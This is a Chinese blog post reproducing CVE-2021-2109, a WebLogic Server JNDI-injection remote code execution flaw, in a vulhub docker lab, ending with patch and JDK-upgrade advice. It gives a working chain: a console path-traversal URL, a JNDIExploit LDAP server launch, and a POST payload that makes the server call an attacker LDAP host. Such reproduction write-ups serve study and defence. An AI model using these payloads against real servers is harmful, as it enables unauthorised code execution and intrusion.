美文网首页
(CVE-2021-2109 )Weblogic Server远

(CVE-2021-2109 )Weblogic Server远

作者: 5f4120c4213b | 来源:发表于2021-02-02 17:59 被阅读0次

0x00简介

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

image

0x01漏洞概述

该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。

0x02影响版本

Weblogic Server 10.3.6.0.0

Weblogic Server 12.1.3.0.0

Weblogic Server 12.2.1.3.0

Weblogic Server 12.2.1.4.0

Weblogic Server 14.1.1.0.0

0x03环境搭建

  1. 本次漏洞环境使用vulhub中的docker搭建,下载地址

https://github.com/vulhub/vulhub

  1. 然后使用vulhub中CVE-2020-14882漏洞为本次漏洞复现环境

cd vulhub-master/weblogic/CVE-2020-14882/

docker-compose up -d

image

4.在浏览器访问http://your-ip:7001/console,出现以下页面搭建成功

image

0x04漏洞复现

1.下载LDAP,并启动LDAP,下载地址:

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

注:运行ldap需要java1.8环境

image

java -jar JNDIExploit-v1.11.jar -i 172.16.1.147

image
  1. 使用未授权漏洞配合利用,在首页url处输入以下链接,并进行抓包并发送到重放模块

/console/css/%252e%252e%252f/consolejndi.portal

image
  1. 将get改为post,并构造以下数据包。注:172.16.1;147有个点为分号

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://172.16.1;147:1389/Basic/WeblogicEcho;AdminServer%22)

image image image

0x0****6****修复建议

1、由于是通过JNDI注入进行远程命令执行,所以受到JDK版本的影响,建议升级Weblogic Server运行环境的JDK版本

2、更新最新补丁,参考Oracle官网发布的补丁:

https://www.oracle.com/security-alerts/cpujan2021.html

参考链接:

https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw

相关文章

网友评论

      本文标题:(CVE-2021-2109 )Weblogic Server远

      本文链接:https://www.haomeiwen.com/subject/yagytltx.html